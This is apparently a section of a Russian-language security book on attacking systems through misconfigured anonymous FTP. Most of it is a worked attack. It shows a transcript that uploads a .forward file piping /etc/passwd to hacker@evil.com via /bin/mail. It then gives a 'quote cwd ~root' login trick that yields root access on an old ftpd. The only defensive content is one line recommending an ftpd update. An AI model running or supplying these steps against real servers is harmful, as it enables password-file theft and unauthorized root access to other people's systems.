Атака через Internet

Атака с использованием анонимного ftp


Анонимный ftp-сервис (обнаружить его наличие чрезвычайно легко, и это не должно возбуждать никаких подозрений) может служить легким способом получения доступа, поскольку его часто неправильно конфигурируют. Например, система может иметь полную копию файла /etc/passwd в каталоге ~ftp/etc вместо урезанной версии - со всеми вытекающими отсюда последствиями (см. предыдущий пункт). Кроме того, можно применить и более изощренный способ - в следующем примере домашний каталог специального пользователя ftp на victim.com доступен для записи. Это позволяет послать по почте самому себе файл /etc/passwd атакуемой машины. Для этого надо создать файл .forward в домашнем каталоге ftp, который выполняется, когда пользователю ftp посылается почта. Происходит это следующим образом: evil % cat forward_sucker_file

"|/bin/mail hacker@evil.com < /etc/passwd" evil % ftp victim.com

Connected to victim.com 220 victim FTP server ready. Name (victim.com:hacker): ftp

331 Guest login ok, send ident as password. Password: ***** 230 Guest login ok, access restrictions apply. ftp> ls -lga

200 PORT command successful. 150 ASCII data connection for /bin/ls (192.192.192.1,1129) (0 bytes). total 5 drwxr-xr-x 4 101 1 512 Jun 20 1991 . drwxr-xr-x 4 101 1 512 Jun 20 1991 .. drwxr-xr-x 2 0 1 512 Jun 20 1991 bin drwxr-xr-x 2 0 1 512 Jun 20 1991 etc drwxr-xr-x 3 101 1 512 Aug 22 1991 pub 226 ASCII Transfer complete. 242 bytes received in 0.066 seconds (3.6 Kbytes/s) ftp> put forward_sucker_file .forward

43 bytes sent in 0.0015 seconds (28 Kbytes/s) ftp> quit

evil % echo test | mail ftp@victim.com

Теперь можно просто сидеть и ждать, когда файл с паролями будет послан обратно.

Очевидно, что такая атака (как и следующая) является типичной по сценарию 2.

Рассматривая ftp, можно проверить более старую ошибку: % ftp -n

ftp> open victim.com

Connected to victim.com 220 victim.com FTP server ready. ftp> quote user ftp

331 Guest login ok, send ident as password. ftp> quote cwd ~ root

530 Please login with USER and PASS. ftp> quote pass ftp

230 Guest login ok, access restrictions apply. ftp> ls -al /

Если этот прием сработал, то атакующий теперь вошел в систему как системный администратор ( root ). Если данная ошибка имеется в системе, то следует обязательно обновить ftpd.

Далее мы еще рассмотрим более свежие "дыры" в ftp-демонах.



Содержание раздела